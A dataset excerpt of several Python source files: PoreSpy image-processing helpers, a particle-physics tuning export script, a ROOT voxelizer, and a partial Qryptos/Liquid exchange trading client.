Notes\n -----\n This function uses ``scipy.signal.fftconvolve`` which *can* be more than\n 10x faster than the standard binary morphology operation in\n ``scipy.ndimage``. This speed up may not always be realized, depending\n on the scipy distribution used.\n\n Examples\n --------\n >>> import porespy as ps\n >>> from numpy import array_equal\n >>> import scipy.ndimage as spim\n >>> from skimage.morphology import disk\n >>> im = ps.generators.blobs(shape=[100, 100], porosity=0.8)\n\n Check that erosion, dilation, opening, and closing are all the same as\n the ``scipy.ndimage`` functions:\n\n >>> result = ps.filters.fftmorphology(im, strel=disk(5), mode='erosion')\n >>> temp = spim.binary_erosion(im, structure=disk(5))\n >>> array_equal(result, temp)\n True\n\n >>> result = ps.filters.fftmorphology(im, strel=disk(5), mode='dilation')\n >>> temp = spim.binary_dilation(im, structure=disk(5))\n >>> array_equal(result, temp)\n True\n\n >>> result = ps.filters.fftmorphology(im, strel=disk(5), mode='opening')\n >>> temp = spim.binary_opening(im, structure=disk(5))\n >>> array_equal(result, temp)\n True\n\n >>> result = ps.filters.fftmorphology(im, strel=disk(5), mode='closing')\n >>> temp = spim.binary_closing(im, structure=disk(5))\n >>> # This one does not work yet!!\n\n \"\"\"\n def erode(im, strel):\n t = fftconvolve(im, strel, mode='same') > (strel.sum() - 0.1)\n return t\n\n def dilate(im, strel):\n t = fftconvolve(im, strel, mode='same') > 0.1\n return t\n\n # The array must be padded with 0's so it works correctly at edges\n temp = sp.pad(array=im, pad_width=1, mode='constant', constant_values=0)\n # Perform erosion\n if mode.startswith('ero'):\n temp = erode(temp, strel)\n if mode.startswith('open'):\n temp = erode(temp, strel)\n temp = dilate(temp, strel)\n if mode.startswith('dila'):\n temp = dilate(temp, strel)\n if mode.startswith('clos'):\n temp = dilate(temp, strel)\n temp = erode(temp, strel)\n # Remove padding from resulting image\n if im.ndim == 2:\n result = temp[1:-1, 1:-1]\n elif im.ndim == 3:\n result = temp[1:-1, 1:-1, 1:-1]\n return result\n\n\ndef subdivide(im, divs=2):\n r\"\"\"\n Returns slices into an image describing the specified number of sub-arrays.\n This function is useful for performing operations on smaller images for\n memory or speed. Note that for most typical operations this will NOT work,\n since the image borders would cause artifacts (e.g. ``distance_transform``)\n\n Parameters\n ----------\n im : ND-array\n The image of the porous media\n\n divs : scalar or array_like\n The number of sub-divisions to create in each axis of the image. If a\n scalar is given it is assumed this value applies in all dimensions.\n\n Returns\n -------\n An ND-array containing slice objects for indexing into ``im`` that extract\n the sub-divided arrays.\n\n Notes\n -----\n This method uses the\n `array_split package `_ which\n offers the same functionality as the ``split`` method of Numpy's ND-array,\n but supports the splitting multidimensional arrays in all dimensions.\n\n Examples\n --------\n >>> import porespy as ps\n >>> import matplotlib.pyplot as plt\n >>> im = ps.generators.blobs(shape=[200, 200])\n >>> s = ps.tools.subdivide(im, divs=[2, 2])\n\n ``s`` contains an array with the shape given by ``divs``. To access the\n first and last quadrants of ``im`` use:\n >>> print(im[s[0, 0]].shape)\n (100, 100)\n >>> print(im[s[1, 1]].shape)\n (100, 100)\n\n It can be easier to index the array with the slices by applying ``flatten``\n first:\n >>> s_flat = s.flatten()\n >>> for i in s_flat:\n ... print(im[i].shape)\n (100, 100)\n (100, 100)\n (100, 100)\n (100, 100)\n \"\"\"\n # Expand scalar divs\n if sp.array(divs, ndmin=1).size == 1:\n divs = [divs for i in range(im.ndim)]\n s = shape_split(im.shape, axis=divs)\n return s\n\n\ndef bbox_to_slices(bbox):\n r\"\"\"\n Given a tuple containing bounding box coordinates, return a tuple of slice\n objects.\n\n Parameters\n ----------\n bbox : tuple of ints\n The bounding box indices in the form (``xmin``, ``ymin``, ``zmin``,\n ``xmax``, ``ymax``, ``zmax``). For a 2D image, simply omit the\n ``zmin`` and ``zmax`` entries.\n\n Returns\n -------\n A tuple of slice objects that can be used to directly index into a larger\n image. A\n \"\"\"\n if len(bbox) == 4:\n ret = (slice(bbox[0], bbox[2]),\n slice(bbox[1], bbox[3]))\n else:\n ret = (slice(bbox[0], bbox[3]),\n slice(bbox[1], bbox[4]),\n slice(bbox[2], bbox[5]))\n return ret\n\n\ndef get_slice(im, center, size, pad=0):\n r\"\"\"\n Given a ``center`` location and ``radius`` of a feature, returns the slice\n object into the ``im`` that bounds the feature but does not extend beyond\n the image boundaries.\n\n Parameters\n ----------\n im : ND-image\n The image of the porous media\n\n center : array_like\n The coordinates of the center of the feature of interest\n\n size : array_like or scalar\n The size of the feature in each direction. If a scalar is supplied,\n this implies the same size in all directions.\n\n pad : scalar or array_like\n The amount to pad onto each side of the slice. The default is 0. A\n scalar value will increase the slice size equally in all directions,\n while an array the same shape as ``im.shape`` can be passed to pad\n a specified amount in each direction.\n\n Returns\n -------\n A list of slice objects, each indexing into one dimension of the image.\n \"\"\"\n p = sp.ones(shape=im.ndim, dtype=int)*sp.array(pad)\n s = sp.ones(shape=im.ndim, dtype=int)*sp.array(size)\n slc = []\n for dim in range(im.ndim):\n lower_im = sp.amax((center[dim] - s[dim] - p[dim], 0))\n upper_im = sp.amin((center[dim] + s[dim] + 1 + p[dim], im.shape[dim]))\n slc.append(slice(lower_im, upper_im))\n return slc\n\n\ndef find_outer_region(im, r=0):\n r\"\"\"\n Finds regions of the image that are outside of the solid matrix. This\n function uses the rolling ball method to define where the outer region\n ends and the void space begins.\n\n This function is particularly useful for samples that do not fill the\n entire rectangular image, such as cylindrical cores or samples with non-\n parallel faces.\n\n Parameters\n ----------\n im : ND-array\n Image of the porous material with 1's for void and 0's for solid\n\n r : scalar\n The radius of the rolling ball to use. If not specified then a value\n is calculated as twice maximum of the distance transform. The image\n size is padded by this amount in all directions, so the image can\n become quite large and unwieldy if too large a value is given.\n\n Returns\n -------\n A boolean mask the same shape as ``im``, containing True in all voxels\n identified as *outside* the sample.\n\n \"\"\"\n if r == 0:\n dt = spim.distance_transform_edt(input=im)\n r = int(sp.amax(dt))*2\n im_padded = sp.pad(array=im, pad_width=r, mode='constant',\n constant_values=True)\n dt = spim.distance_transform_edt(input=im_padded)\n seeds = (dt >= r) + get_border(shape=im_padded.shape)\n # Remove seeds not connected to edges\n labels = spim.label(seeds)[0]\n mask = labels == 1 # Assume label of 1 on edges, assured by adding border\n dt = spim.distance_transform_edt(~mask)\n outer_region = dt < r\n outer_region = extract_subsection(im=outer_region, shape=im.shape)\n return outer_region\n\n\ndef extract_cylinder(im, r=None, axis=0):\n r\"\"\"\n Returns a cylindrical section of the image of specified radius. This is\n useful for making square images look like cylindrical cores such as those\n obtained from X-ray tomography.\n\n Parameters\n ----------\n im : ND-array\n The image of the porous material\n\n r : scalr\n The radius of the cylinder to extract. If none if given then the\n default is the largest cylinder that can fit inside the x-y plane.\n\n axis : scalar\n The axis along with the cylinder will be oriented.\n\n Returns\n -------\n An ND-image the same size ``im`` with True values indicating the void space\n but with the sample trimmed to a cylindrical section in the center of the\n image. The region outside the cylindrical section is labeled with True\n values since it is open space.\n \"\"\"\n if r is None:\n a = list(im.shape)\n a.pop(axis)\n r = sp.amin(a)/2\n dim = [range(int(-s/2), int(s/2)) for s in im.shape]\n inds = sp.meshgrid(*dim, indexing='ij')\n inds[axis] = inds[axis]*0\n d = sp.sqrt(sp.sum(sp.square(inds), axis=0))\n mask = d <= r\n im[~mask] = True\n return im\n\n\ndef extract_subsection(im, shape):\n r\"\"\"\n Extracts the middle section of a image\n\n Parameters\n ----------\n im : ND-array\n Image from which to extract the subsection\n\n shape : array_like\n Can either specify the size of the extracted section or the fractional\n size of the image to extact.\n\n Returns\n -------\n An ND-array of size given by the ``shape`` argument, taken from the center\n of the image.\n\n Examples\n --------\n >>> import scipy as sp\n >>> from porespy.tools import extract_subsection\n >>> im = sp.array([[1, 1, 1, 1], [1, 2, 2, 2], [1, 2, 3, 3], [1, 2, 3, 4]])\n >>> print(im)\n [[1 1 1 1]\n [1 2 2 2]\n [1 2 3 3]\n [1 2 3 4]]\n >>> im = extract_subsection(im=im, shape=[2, 2])\n >>> print(im)\n [[2 2]\n [2 3]]\n\n \"\"\"\n # Check if shape was given as a fraction\n shape = sp.array(shape)\n if shape[0] < 1:\n shape = sp.array(im.shape)*shape\n center = sp.array(im.shape)/2\n s_im = []\n for dim in range(im.ndim):\n r = shape[dim]/2\n lower_im = sp.amax((center[dim]-r, 0))\n upper_im = sp.amin((center[dim]+r, im.shape[dim]))\n s_im.append(slice(int(lower_im), int(upper_im)))\n return im[tuple(s_im)]\n\n\ndef get_planes(im, squeeze=True):\n r\"\"\"\n Extracts three planar images from the volumetric image, one for each\n principle axis. The planes are taken from the middle of the domain.\n\n Parameters\n ----------\n im : ND-array\n The volumetric image from which the 3 planar images are to be obtained\n\n squeeze : boolean, optional\n If True (default) the returned images are 2D (i.e. squeezed). If\n False, the images are 1 element deep along the axis where the slice\n was obtained.\n \"\"\"\n x, y, z = (sp.array(im.shape)/2).astype(int)\n planes = [im[x, :, :], im[:, y, :], im[:, :, z]]\n if not squeeze:\n imx = planes[0]\n planes[0] = sp.reshape(imx, [1, imx.shape[0], imx.shape[1]])\n imy = planes[1]\n planes[1] = sp.reshape(imy, [imy.shape[0], 1, imy.shape[1]])\n imz = planes[2]\n planes[2] = sp.reshape(imz, [imz.shape[0], imz.shape[1], 1])\n return planes\n\n\ndef extend_slice(s, shape, pad=1):\n r\"\"\"\n Adjust slice indices to include additional voxles around the slice. The\n key to this function is that is does bounds checking to ensure the indices\n don't extend outside the image.\n\n Parameters\n ----------\n s : list of slice objects\n A list (or tuple) of N slice objects, where N is the number of\n dimensions in the image.\n\n shape : array_like\n The shape of the image into which the slice objects apply. This is\n used to check the bounds to prevent indexing beyond the image.\n\n pad : int\n The number of voxels to expand in each direction.\n\n Returns\n -------\n A list slice objects with the start and stop attributes respectively\n incremented and decremented by 1, without extending beyond the image\n boundaries.\n\n Examples\n --------\n >>> from scipy.ndimage import label, find_objects\n >>> from porespy.tools import extend_slice\n >>> im = sp.array([[1, 0, 0], [1, 0, 0], [0, 0, 1]])\n >>> labels = label(im)[0]\n >>> s = find_objects(labels)\n\n Using the slices returned by ``find_objects``, set the first label to 3\n\n >>> labels[s[0]] = 3\n >>> print(labels)\n [[3 0 0]\n [3 0 0]\n [0 0 2]]\n\n Next extend the slice, and use it to set the values to 4\n\n >>> s_ext = extend_slice(s[0], shape=im.shape, pad=1)\n >>> labels[s_ext] = 4\n >>> print(labels)\n [[4 4 0]\n [4 4 0]\n [4 4 2]]\n\n As can be seen by the location of the 4s, the slice was extended by 1, and\n also handled the extension beyond the boundary correctly.\n \"\"\"\n pad = int(pad)\n a = []\n for i, dim in zip(s, shape):\n start = 0\n stop = dim\n if i.start - pad >= 0:\n start = i.start - pad\n if i.stop + pad < dim:\n stop = i.stop + pad\n a.append(slice(start, stop, None))\n return tuple(a)\n\n\ndef binary_opening_fft(im, strel):\n r\"\"\"\n Using the ``scipy.signal.fftconvolve`` function (twice) to accomplish\n binary image opening.\n\n The use of the fft-based convolution produces a 10x speed-up compared to\n the standard ``binary_opening`` included in ``scipy.ndimage``.\n\n See Also\n --------\n binary_opening_dt\n\n Notes\n -----\n The ``fftconvolve`` function is only optimzed in some scipy installations,\n depending how it was compiled. If the promised speed-up is not acheived,\n this may be the issue. Using ``binary_opening_dt`` should still be fast\n but is limited to spherical and circular structing elements.\n\n \"\"\"\n if isinstance(strel, int):\n if im.ndim == 2:\n strel = disk(strel)\n else:\n strel = ball(strel)\n seeds = sp.signal.fftconvolve(im, strel) > (strel.sum() - 0.1)\n result = sp.signal.fftconvolve(seeds, strel) > 0.1\n result = extract_subsection(result, im.shape)\n return result\n\n\ndef binary_opening_dt(im, r):\n r\"\"\"\n Perform a morphological opening that does not slow down with larger\n structuring elements.\n\n It uses a shortcut based on the distance transform, which means it only\n applies to spherical (or cicular if the image is 2d) structuring elements.\n\n Parameters\n ----------\n im : ND-array\n The image of the porous material with True values (or 1's) indicating\n the pore phase.\n\n r : scalar, int\n The radius of the spherical structuring element to apply\n\n Returns\n -------\n A binary image with ``True`` values in all locations where a sphere of size\n ``r`` could fit entirely within the pore space.\n\n See Also\n --------\n binary_opening_fft\n\n \"\"\"\n temp = sp.pad(im, pad_width=1, mode='constant', constant_values=0)\n dt = spim.distance_transform_edt(temp)\n seeds = dt > r\n im_opened = spim.distance_transform_edt(~seeds) <= r\n im_opened = extract_subsection(im_opened, im.shape)\n return im_opened\n\n\ndef randomize_colors(im, keep_vals=[0]):\n r'''\n Takes a greyscale image and randomly shuffles the greyscale values, so that\n all voxels labeled X will be labelled Y, and all voxels labeled Y will be\n labeled Z, where X, Y, Z and so on are randomly selected from the values\n in the input image.\n\n This function is useful for improving the visibility of images with\n neighboring regions that are only incrementally different from each other,\n such as that returned by `scipy.ndimage.label`.\n\n Parameters\n ----------\n im : array_like\n An ND image of greyscale values.\n\n keep_vals : array_like\n Indicate which voxel values should NOT be altered. The default is\n `[0]` which is useful for leaving the background of the image\n untouched.\n\n Returns\n -------\n An image the same size and type as `im` but with the greyscale values\n reassigned. The unique values in both the input and output images will\n be identical.\n\n Notes\n -----\n If the greyscale values in the input image are not contiguous then the\n neither will they be in the output.\n\n Examples\n --------\n >>> import porespy as ps\n >>> import scipy as sp\n >>> sp.random.seed(0)\n >>> im = sp.random.randint(low=0, high=5, size=[4, 4])\n >>> print(im)\n [[4 0 3 3]\n [3 1 3 2]\n [4 0 0 4]\n [2 1 0 1]]\n >>> im_rand = ps.tools.randomize_colors(im)\n >>> print(im_rand)\n [[2 0 4 4]\n [4 1 4 3]\n [2 0 0 2]\n [3 1 0 1]]\n\n As can be seen, the 2's have become 3, 3's have become 4, and 4's have\n become 2. 1's remained 1 by random accident. 0's remain zeros by default,\n but this can be controlled using the `keep_vals` argument.\n\n '''\n im_flat = im.flatten()\n keep_vals = sp.array(keep_vals)\n swap_vals = ~sp.in1d(im_flat, keep_vals)\n im_vals = sp.unique(im_flat[swap_vals])\n new_vals = sp.random.permutation(im_vals)\n im_map = sp.zeros(shape=[sp.amax(im_vals) + 1, ], dtype=int)\n im_map[im_vals] = new_vals\n im_new = im_map[im_flat]\n im_new = sp.reshape(im_new, newshape=sp.shape(im))\n return im_new\n\n\ndef make_contiguous(im):\n r\"\"\"\n Take an image with arbitrary greyscale values and adjust them to ensure\n all values fall in a contiguous range starting at 0.\n\n Parameters\n ----------\n im : array_like\n An ND array containing greyscale values\n\n Returns\n -------\n An ND-array the same size as ``im`` but with all values in contiguous\n orders.\n\n Example\n -------\n >>> import porespy as ps\n >>> import scipy as sp\n >>> im = sp.array([[0, 2, 9], [6, 8, 3]])\n >>> im = ps.tools.make_contiguous(im)\n >>> print(im)\n [[0 1 5]\n [3 4 2]]\n\n \"\"\"\n im_flat = im.flatten()\n im_vals = sp.unique(im_flat)\n im_map = sp.zeros(shape=sp.amax(im_flat)+1)\n im_map[im_vals] = sp.arange(0, sp.size(sp.unique(im_flat)))\n im_new = im_map[im_flat]\n im_new = sp.reshape(im_new, newshape=sp.shape(im))\n im_new = sp.array(im_new, dtype=im_flat.dtype)\n return im_new\n\n\ndef get_border(shape, thickness=1, mode='edges'):\n r\"\"\"\n Creates an array of specified size with corners, edges or faces labelled as\n True. This can be used as mask to manipulate values laying on the\n perimeter of an image.\n\n Parameters\n ----------\n shape : array_like\n The shape of the array to return. Can be either 2D or 3D.\n\n thickness : scalar (default is 1)\n The number of pixels/voxels to place along perimeter.\n\n mode : string\n The type of border to create. Options are 'faces', 'edges' (default)\n and 'corners'. In 2D 'faces' and 'edges' give the same result.\n\n Returns\n -------\n An ND-array of specified shape with True values at the perimeter and False\n elsewhere.\n\n Examples\n --------\n >>> import porespy as ps\n >>> import scipy as sp\n >>> mask = ps.tools.get_border(shape=[3, 3], mode='corners')\n >>> print(mask)\n [[ True False True]\n [False False False]\n [ True False True]]\n >>> mask = ps.tools.get_border(shape=[3, 3], mode='edges')\n >>> print(mask)\n [[ True True True]\n [ True False True]\n [ True True True]]\n \"\"\"\n ndims = len(shape)\n t = thickness\n border = sp.ones(shape, dtype=bool)\n if mode == 'faces':\n if ndims == 2:\n border[t:-t, t:-t] = False\n if ndims == 3:\n border[t:-t, t:-t, t:-t] = False\n elif mode == 'edges':\n if ndims == 2:\n border[t:-t, t:-t] = False\n if ndims == 3:\n border[0::, t:-t, t:-t] = False\n border[t:-t, 0::, t:-t] = False\n border[t:-t, t:-t, 0::] = False\n elif mode == 'corners':\n if ndims == 2:\n border[t:-t, 0::] = False\n border[0::, t:-t] = False\n if ndims == 3:\n border[t:-t, 0::, 0::] = False\n border[0::, t:-t, 0::] = False\n border[0::, 0::, t:-t] = False\n return border\n\n\ndef in_hull(points, hull):\n \"\"\"\n Test if a list of coordinates are inside a given convex hull\n\n Parameters\n ----------\n points : array_like (N x ndims)\n The spatial coordinates of the points to check\n\n hull : scipy.spatial.ConvexHull object **OR** array_like\n Can be either a convex hull object as returned by\n ``scipy.spatial.ConvexHull`` or simply the coordinates of the points\n that define the convex hull.\n\n Returns\n -------\n A Boolean array of length *N* indicating whether or not the given points\n in ``points`` lies within the provided ``hull``.\n\n \"\"\"\n from scipy.spatial import Delaunay, ConvexHull\n if isinstance(hull, ConvexHull):\n hull = hull.points\n hull = Delaunay(hull)\n return hull.find_simplex(points) >= 0\n\n\ndef norm_to_uniform(im, scale=None):\n r\"\"\"\n Take an image with normally distributed greyscale values and converts it to\n a uniform (i.e. flat) distribution. It's also possible to specify the\n lower and upper limits of the uniform distribution.\n\n Parameters\n ----------\n im : ND-image\n The image containing the normally distributed scalar field\n\n scale : [low, high]\n A list or array indicating the lower and upper bounds for the new\n randomly distributed data. The default is ``None``, which uses the\n ``max`` and ``min`` of the original image as the the lower and upper\n bounds, but another common option might be [0, 1].\n\n Returns\n -------\n An ND-image the same size as ``im`` with uniformly distributed greyscale\n values spanning the specified range, if given.\n \"\"\"\n if scale is None:\n scale = [im.min(), im.max()]\n im = (im - sp.mean(im))/sp.std(im)\n im = 1/2*sp.special.erfc(-im/sp.sqrt(2))\n im = (im - im.min()) / (im.max() - im.min())\n im = im*(scale[1] - scale[0]) + scale[0]\n return im\n","sub_path":"porespy/tools/__funcs__.py","file_name":"__funcs__.py","file_ext":"py","file_size_in_byte":23403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"495175084","text":"#!/usr/bin/env python\n\nfrom RingerCore import LoggingLevel, expandFolders, Logger, mkdir_p\nfrom TuningTools import CrossValidStatAnalysis, RingerOperation\nfrom pprint import pprint\nimport os\nmainLogger = Logger.getModuleLogger( __name__ )\n\n\nbasepath = 'data/crossval/'\ncrossval = [\n [basepath+'mc16a.zee.20M.jf17.20M.offline.binned.caloAndTrack.wdatadrivenlh.v6.crossValStat_Offline_LH_DataDriven2016_Rel21_Tight_PileupCorrection/', ],\n #[basepath+'mc16a.zee.20M.jf17.20M.offline.binned.caloAndTrack.wdatadrivenlh.v6.crossValStat_Offline_LH_DataDriven2016_Rel21_Medium_PileupCorrection/', ],\n #[basepath+'mc16a.zee.20M.jf17.20M.offline.binned.caloAndTrack.wdatadrivenlh.v6.crossValStat_Offline_LH_DataDriven2016_Rel21_Loose_PileupCorrection/', ],\n #[basepath+'mc16a.zee.20M.jf17.20M.offline.binned.caloAndTrack.wdatadrivenlh.v6.crossValStat_Offline_LH_DataDriven2016_Rel21_VeryLoose_PileupCorrection/', ],\n ]\n\nfilenameWeights = [\n 'ElectronRingerTightConstants',\n #'ElectronRingerMediumConstants',\n #'ElectronRingerLooseConstants',\n #'ElectronRingerVeryloooseConstants',\n ]\n\nfilenameThres = [\n 'ElectronRingerTightThresholds',\n #'ElectronRingerMediumThresholds',\n #'ElectronRingerLooseThresholds',\n #'ElectronRingerVeryLooseThresholds',\n ]\n\n\nref = 'Pd'\n\n\n\n####################### Extract Ringer Configuration #########################\n\nfrom TuningTools import CreateSelectorFiles\n\nexport = CreateSelectorFiles()\nexport( crossval, filenameWeights, filenameThres, ref )\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"TuningTools_old/scripts/analysis_scripts/dev/Offline_mc16_201802XX_v6/export_tuning.py","file_name":"export_tuning.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"643091651","text":"import shelve\nfrom ROOT import *\nfrom tools import *\nfrom sys import argv\n\nprefijo = 'SE/'\n\nfor x,y,z,E,dE,chi2n,chi2r in ReadData(prefijo):\n z0 = min(z)\n Nz = int(max(z)-z0)+1\n z1 = z0 + Nz\n\n x0 = min(x)\n Nx = int(max(x)-x0)+1\n x1 = x0 + Nx\n\n y0 = min(y)\n Ny = int(max(y)-y0)+1\n y1 = y0 + Ny\n\n H = TH3F('a','',Nz,z0,z1,Nx,x0,x1,Ny,y0,y1)\n h = H.Clone()\n for xi,yi,zi,Ei in zip(x,y,z,E):\n bin = h.Fill(zi,xi,yi)\n H.SetBinContent( bin, H.GetBinContent(bin) + Ei )\n\n H.Draw()\n raw_input()\n del H\n","sub_path":"Voxelizer.py","file_name":"Voxelizer.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"224981662","text":"import threading\nimport time\nimport traceback\nimport sys\nfrom aj_sns.creds_retriever import get_creds\nfrom decimal import Decimal\nfrom aj_sns.log_service import logger\nfrom quoine.client import Qryptos\nfrom quoine.exceptions import QuoineAPIException\n\nfrom exchanges.exchange import Exchange\n\n\nclass QryptosService(Exchange):\n def __init__(self, name, public_key, private_key, poll_time_s=5, tick_tock=True):\n Exchange.__init__(self, name)\n self.pending_cancel = {}\n self.client = Qryptos(public_key, private_key)\n self.client.API_URL = 'https://api.liquid.com'\n self.internal_to_external_id = {}\n self.external_to_internal_id = {}\n self.open_orders_by_exchange_id = {}\n self.symbol_to_product = {}\n self.markets_following = {}\n product_list = self.client.get_products()\n for product in product_list:\n if 'product_type' in product and product['product_type'] == 'CurrencyPair':\n self.symbol_to_product[product['currency_pair_code']] = product['id']\n\n self.poll_time_s = poll_time_s\n self.tick_tock = tick_tock\n self.name = name\n\n if tick_tock is True:\n threading.Timer(self.poll_time_s, self.on_tick).start()\n\n def can_withdraw(self, withdraw):\n return False\n\n def withdraw(self, currency, amount, address, tag=None, cb=None, **kwargs):\n raise NotImplementedError('Qryptos does not have a withdraw function in their API')\n\n def on_tick(self):\n logger().info('tick')\n\n if len(self.callbacks) > 0:\n for product_id, details in self.markets_following.copy().items():\n try:\n base = details['base']\n quote = details['quote']\n\n self._send_executions_to_cb(base, quote)\n self._send_order_book_to_cb(base, quote)\n except Exception as e:\n traceback.print_exc(file=sys.stdout)\n logger().error('on_tick failed with error: ' + str(e))\n\n logger().info('tock')\n if len(self.markets_following) > 0:\n threading.Timer(self.poll_time_s, self.on_tick).start()\n\n def _send_order_book_to_cb(self, base, quote):\n book = self.get_order_book(base, quote)\n\n self.notify_callbacks('order_book', data=book)\n\n def _send_executions_to_cb(self, base, quote):\n if len(self.open_orders_by_exchange_id) == 0:\n return\n\n for open_order in self.open_orders_by_exchange_id.copy().values():\n exchange_order = self.client.get_order(open_order['exchange_order_id'])\n newly_executed_amount = Decimal(str(exchange_order['filled_quantity'])) - \\\n Decimal(str(open_order['cum_quantity_filled']))\n\n if newly_executed_amount > Decimal(0):\n open_order['cum_quantity_filled'] = Decimal(exchange_order['filled_quantity'])\n\n if 'fee_base' in open_order.keys():\n fee_base_delta = Decimal(exchange_order['order_fee']) - Decimal(open_order['fee_base'])\n else:\n fee_base_delta = Decimal(exchange_order['order_fee'])\n\n open_order['fee_base'] = Decimal(exchange_order['order_fee'])\n\n if exchange_order['status'] == 'filled':\n status = 'FILLED'\n self.open_orders_by_exchange_id.pop(str(exchange_order['id']))\n self.external_to_internal_id.pop(str(open_order['exchange_order_id']))\n self.internal_to_external_id.pop(str(open_order['internal_order_id']))\n elif exchange_order['status'] == 'cancelled':\n status = 'CANCELED'\n self.open_orders_by_exchange_id.pop(str(exchange_order['id']))\n self.external_to_internal_id.pop(str(open_order['exchange_order_id']))\n self.internal_to_external_id.pop(str(open_order['internal_order_id']))\n else:\n status = 'PARTIALLY_FILLED'\n\n message = {\n 'action': 'EXECUTION',\n 'exchange': self.name,\n 'base': base,\n 'quote': quote,\n 'exchange_order_id': str(open_order['exchange_order_id']),\n 'internal_order_id': str(open_order['internal_order_id']),\n 'side': open_order['side'],\n 'quantity': open_order['quantity'],\n 'price': open_order['price'],\n 'cum_quantity_filled': open_order['cum_quantity_filled'],\n 'order_status': status,\n 'server_ms': int(round(time.time() * 1000)),\n 'received_ms': int(round(time.time() * 1000)),\n 'last_executed_quantity': newly_executed_amount,\n 'last_executed_price': open_order['price'],\n 'fee_base': fee_base_delta,\n 'fee_quote': Decimal('0'),\n 'trade_id': '-1'\n }\n\n self.notify_callbacks('trade_lifecycle', trade_lifecycle_type=message['action'], data=message)\n\n def follow_market(self, base, quote):\n product_id = self.get_product_id(base, quote)\n self.markets_following[str(product_id)] = {'base': base, 'quote': quote}\n\n # If this is the first market we've followed, start the tick tock\n if self.markets_following == 1 and self.tick_tock is True:\n threading.Timer(self.poll_time_s, self.on_tick).start()\n\n def unfollow_market(self, base, quote):\n product_id = self.get_product_id(base, quote)\n self.markets_following.pop(str(product_id), None)\n\n def unfollow_all(self):\n self.markets_following = {}\n\n def get_exchange_id(self, internal_id):\n if internal_id in self.internal_to_external_id:\n return self.internal_to_external_id[internal_id]\n\n raise LookupError('Could not find open order with internal id: {}'.format(internal_id))\n\n def cancel_order(self, base, quote, internal_order_id, request_id, requester_id=None, exchange_order_id=None):\n try:\n if exchange_order_id is None:\n exchange_order_id = self.get_exchange_id(internal_order_id)\n except LookupError:\n self.notify_callbacks('trade_lifecycle', data={\n 'action': 'CANCEL_FAILED',\n 'base': base,\n 'quote': quote,\n 'reason': 'order_not_found',\n 'exchange': self.name,\n 'exchange_order_id': str(exchange_order_id),\n 'internal_order_id': str(internal_order_id),\n 'order_status': 'UNKNOWN',\n 'server_ms': int(round(time.time() * 1000)),\n 'received_ms': int(round(time.time() * 1000))\n })\n return\n\n try:\n response = self.client.cancel_order(exchange_order_id)\n\n if ('message' in response and len(response['message']) > 0) or \\\n ('errors' in response and len(response['errors']) > 0):\n self.notify_callbacks('trade_lifecycle', data={\n 'action': 'CANCEL_FAILED',\n 'reason': 'order_not_found',\n 'base': base,\n 'quote': quote,\n 'exchange': self.name,\n 'exchange_order_id': str(exchange_order_id),\n 'internal_order_id': str(internal_order_id),\n 'order_status': 'UNKNOWN',\n 'server_ms': int(round(time.time() * 1000)),\n 'received_ms': int(round(time.time() * 1000))\n })\n self.internal_to_external_id.pop(str(internal_order_id), None)\n self.external_to_internal_id.pop(str(exchange_order_id), None)\n self.open_orders_by_exchange_id.pop(str(exchange_order_id), None)\n return\n except QuoineAPIException as e:\n logger().error('Failed to cancel order with error: {}'.format(e))\n self.notify_callbacks('trade_lifecycle', data={\n 'action': 'CANCEL_FAILED',\n 'reason': 'Unknown exception type',\n 'base': base,\n 'quote': quote,\n 'exchange': self.name,\n 'exchange_order_id': str(exchange_order_id),\n 'internal_order_id': str(internal_order_id),\n 'order_status': 'UNKNOWN',\n 'server_ms': int(round(time.time() * 1000)),\n 'received_ms': int(round(time.time() * 1000))\n })\n # If fails due to \"already closed\" or \"not found\", then popping is fine\n # TODO - If it fails due to a rate limit, we probably don't want this here?\n self.internal_to_external_id.pop(str(internal_order_id), None)\n self.external_to_internal_id.pop(str(exchange_order_id), None)\n self.open_orders_by_exchange_id.pop(str(exchange_order_id), None)\n return\n\n self.internal_to_external_id.pop(str(internal_order_id), None)\n self.external_to_internal_id.pop(str(exchange_order_id), None)\n self.open_orders_by_exchange_id.pop(str(exchange_order_id), None)\n\n time.sleep(2)\n\n self.notify_callbacks('trade_lifecycle', data={\n 'action': 'CANCELED',\n 'exchange': self.name,\n 'base': base,\n 'quote': quote,\n 'exchange_order_id': str(exchange_order_id),\n 'internal_order_id': str(internal_order_id),\n 'order_status': 'CANCELED',\n 'server_ms': int(round(time.time() * 1000)),\n 'received_ms': int(round(time.time() * 1000))\n })\n\n def get_withdrawals(self, currency):\n raise NotImplementedError('Qryptos does not have a get_withdrawals function in their API')\n\n def can_deposit(self, currency):\n return False\n\n def get_deposits(self, currency=None):\n raise NotImplementedError('Qryptos does not have a get_deposits function in their API')\n\n def get_order_book(self, base, quote):\n product_id = self.get_product_id(base, quote)\n book = self.client.get_order_book(product_id, full=True)\n book['bids'] = book['buy_price_levels']\n book['asks'] = book['sell_price_levels']\n book.pop('buy_price_levels', None)\n book.pop('sell_price_levels', None)\n\n book['base'] = base\n book['quote'] = quote\n book['exchange'] = self.name\n\n return book\n\n def get_balances(self):\n balances = self.client.get_account_balances()\n\n internal_balances_format = []\n\n for balance in balances:\n internal_balances_format.append({\n 'asset': balance['currency'],\n 'free': Decimal(str(balance['balance'])),\n 'locked': Decimal(0)\n })\n\n self.notify_callbacks('account', account_type='balance', data=internal_balances_format)\n\n return internal_balances_format\n\n def create_order(self, base, quote, price, quantity, side, order_type, internal_order_id, request_id=None,\n requester_id=None, **kwargs):\n product_id = self.get_product_id(base, quote)\n if product_id is None:\n raise LookupError('Could not find a product with a base [{}] and quote [{}]'.format(base, quote))\n\n try:\n exchange_side = self.client.SIDE_BUY if str.lower(side) == 'buy' else self.client.SIDE_SELL\n response = self.client.create_order(order_type, product_id, exchange_side, str(quantity), price=str(price))\n\n if ('message' in response and len(response['message']) > 0) or \\\n ('errors' in response and len(response['errors']) > 0):\n self.notify_callbacks('trade_lifecycle', data={\n 'action': 'CREATE_FAILED',\n 'reason': 'Unknown exception type',\n 'exchange': self.name,\n 'base': base,\n 'quote': quote,\n 'internal_order_id': 